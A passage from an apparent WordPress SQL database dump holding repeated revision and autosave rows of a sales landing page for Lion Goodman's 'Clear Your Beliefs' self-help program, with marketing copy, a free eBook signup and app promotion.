upsets, and limitations.The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.You''re in charge – you decide what you want to believe, and how far you want to go.The program guides you, gently, step-by-step, through the entire process of deleting beliefs.Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-19 23:40:47', '2014-11-20 04:40:47', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0),
(1805, 2, '2014-11-19 21:54:19', '2014-11-20 02:54:19', '<a href="#" class="jp-play" tabindex="1">play</a>\n<a href="#" class="jp-pause" tabindex="1">pause</a>\n<a href="#" class="jp-stop" tabindex="1">stop</a>\n\n<a href="#" class="jp-full-screen" tabindex="1">full screen</a>\n<a href="#" class="jp-restore-screen" tabindex="1">restore screen</a>\n\n<p>Free eBook</p><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /><p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p><p></p>FIRST NAME * EMAIL * <p>  </p><p>Free App</p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /><p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p><p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p><p></p><p> </p> <p> </p><p>  </p>Complete Program\n<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p></p>Release pain and hurts from the pastOpen to deeper, more profound loveRecognize your true spiritual natureBecome more calm and less reactiveRediscover the source of your personal power<p></p>Clear whatever stops you from taking actionOpen yourself to new possibilities of successEliminate blocks and barriers easilyDiscover your true purposeExpress your true magnificence<p></p><h2>How and Why It Works So Well</h2>Beliefs are the major cause of unhappiness, upsets, and limitations.The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.You''re in charge – you decide what you want to believe, and how far you want to go.The program guides you, gently, step-by-step, through the entire process of deleting beliefs.Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-19 21:54:19', '2014-11-20 02:54:19', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1808, 2, '2014-11-19 23:12:38', '2014-11-20 04:12:38', '<a href="#" class="jp-play" tabindex="1">play</a>\n<a href="#" class="jp-pause" tabindex="1">pause</a>\n<a href="#" class="jp-stop" tabindex="1">stop</a>\n\n<a href="#" class="jp-full-screen" tabindex="1">full screen</a>\n<a href="#" class="jp-restore-screen" tabindex="1">restore screen</a>\n\n<p>Free eBook</p> <img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /><p class="tri-panel-p tri-panel-1st-p" style="text-align: center;padding-top: 30px !important;margin: 0px"><strong>Download the free eBook.</strong></p><p></p>FIRST NAME * EMAIL * <p> </p><p>Free App</p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /><p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p><p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p><p></p><p> </p> <p> </p><p>  </p>Complete Program\n<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p></p>Release pain and hurts from the pastOpen to deeper, more profound loveRecognize your true spiritual natureBecome more calm and less reactiveRediscover the source of your personal power<p></p>Clear whatever stops you from taking actionOpen yourself to new possibilities of successEliminate blocks and barriers easilyDiscover your true purposeExpress your true magnificence<p></p><h2>How and Why It Works So Well</h2>Beliefs are the major cause of unhappiness, upsets, and limitations.The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.You''re in charge – you decide what you want to believe, and how far you want to go.The program guides you, gently, step-by-step, through the entire process of deleting beliefs.Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-19 23:12:38', '2014-11-20 04:12:38', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0),
(1806, 2, '2014-11-19 21:56:34', '2014-11-20 02:56:34', '<a href="#" class="jp-play" tabindex="1">play</a>\n<a href="#" class="jp-pause" tabindex="1">pause</a>\n<a href="#" class="jp-stop" tabindex="1">stop</a>\n\n<a href="#" class="jp-full-screen" tabindex="1">full screen</a>\n<a href="#" class="jp-restore-screen" tabindex="1">restore screen</a>\n\n<p>Free eBook</p><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /><p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p><p></p>FIRST NAME * EMAIL * <p>  </p><p>Free App</p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /><p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p><p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p><p></p><p> </p> <p> </p><p>  </p>Complete Program\n<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p></p>Release pain and hurts from the pastOpen to deeper, more profound loveRecognize your true spiritual natureBecome more calm and less reactiveRediscover the source of your personal power<p></p>Clear whatever stops you from taking actionOpen yourself to new possibilities of successEliminate blocks and barriers easilyDiscover your true purposeExpress your true magnificence<p></p><h2>How and Why It Works So Well</h2>Beliefs are the major cause of unhappiness, upsets, and limitations.The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.You''re in charge – you decide what you want to believe, and how far you want to go.The program guides you, gently, step-by-step, through the entire process of deleting beliefs.Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-19 21:56:34', '2014-11-20 02:56:34', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0),
(1807, 2, '2014-11-19 22:01:05', '2014-11-20 03:01:05', '<a href="#" class="jp-play" tabindex="1">play</a>\n<a href="#" class="jp-pause" tabindex="1">pause</a>\n<a href="#" class="jp-stop" tabindex="1">stop</a>\n\n<a href="#" class="jp-full-screen" tabindex="1">full screen</a>\n<a href="#" class="jp-restore-screen" tabindex="1">restore screen</a>\n\n<p>Free eBook</p><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /><p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p><p></p>FIRST NAME * EMAIL * <p>  </p><p>Free App</p><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /><p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p><p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p><p></p><p> </p> <p> </p><p>  </p>Complete Program\n<img style="margin-top: 0px !important;width: 100% !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center;margin-top: 51px;font-size: 16px"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p></p>Release pain and hurts from the pastOpen to deeper, more profound loveRecognize your true spiritual natureBecome more calm and less reactiveRediscover the source of your personal power<p></p>Clear whatever stops you from taking actionOpen yourself to new possibilities of successEliminate blocks and barriers easilyDiscover your true purposeExpress your true magnificence<p></p><h2>How and Why It Works So Well</h2>Beliefs are the major cause of unhappiness, upsets, and limitations.The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.You''re in charge – you decide what you want to believe, and how far you want to go.The program guides you, gently, step-by-step, through the entire process of deleting beliefs.Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><p><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback. I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-revision-v1', '', '', '2014-11-19 22:01:05', '2014-11-20 03:01:05', '', 1793, 'http://clearyourbeliefs.com/1793-revision-v1', 0, 'revision', '', 0),
(1809, 2, '2014-11-20 00:34:35', '2014-11-20 05:34:35', 'Free eBook<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong>FIRST NAME *EMAIL *	 Free App<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong>\n<p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!\n\nComplete Program<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\nRelease pain and hurts from the pastOpen to deeper, more profound loveRecognize your true spiritual natureBecome more calm and less reactiveRediscover the source of your personal power\n\nClear whatever stops you from taking actionOpen yourself to new possibilities of successEliminate blocks and barriers easilyDiscover your true purposeExpress your true magnificence\n<h2>How and Why It Works So Well</h2>\nBeliefs are the major cause of unhappiness, upsets, and limitations.The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.You''re in charge – you decide what you want to believe, and how far you want to go.The program guides you, gently, step-by-step, through the entire process of deleting beliefs.Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n<em>What do I want to experience?</em><em>What belief is creating this experience I don''t want?</em><em>How can I change my belief so I can change my experience?</em><strong>This is the most effective belief-change method that we know of.</strong> Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program. I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback. I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n<h3 style="text-align: center;">Are you a Coach? Therapist? Healer? Change Agent?</h3>\n<p style="text-align: center;">Learn the <em>Clear Your Beliefs</em> process through our 10-week training program. Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>\n\n© Copyright 2014 by Lion Goodman', 'NewCYB', '', 'inherit', 'closed', 'open', '', '1793-autosave-v1', '', '', '2014-11-20 00:34:35', '2014-11-20 05:34:35', '', 1793, 'http://clearyourbeliefs.com/1793-autosave-v1', 0, 'revision', '', 0),
(1820, 2, '2014-11-20 00:09:50', '2014-11-20 05:09:50', '<p></p>Free eBook<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /><p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong>FIRST NAME *EMAIL *	 Free App<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /><p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong><p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!\n\nComplete Program<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 74px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs</strong> – <strong>Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p></p>Release pain and hurts from the pastOpen to deeper, more profound loveRecognize your true spiritual natureBecome more calm and less reactiveRediscover the source of your personal power<p></p>Clear whatever stops you from taking actionOpen yourself to new possibilities of successEliminate blocks and barriers easilyDiscover your true purposeExpress your true magnificence<p></p><h2>How and Why It Works So Well</h2>Beliefs are the major cause of unhappiness, upsets, and limitations.The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.You''re in charge – you decide what you want to believe, and how far you want to go.The program guides you, gently, step-by-step, through the entire process of deleting beliefs.Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. 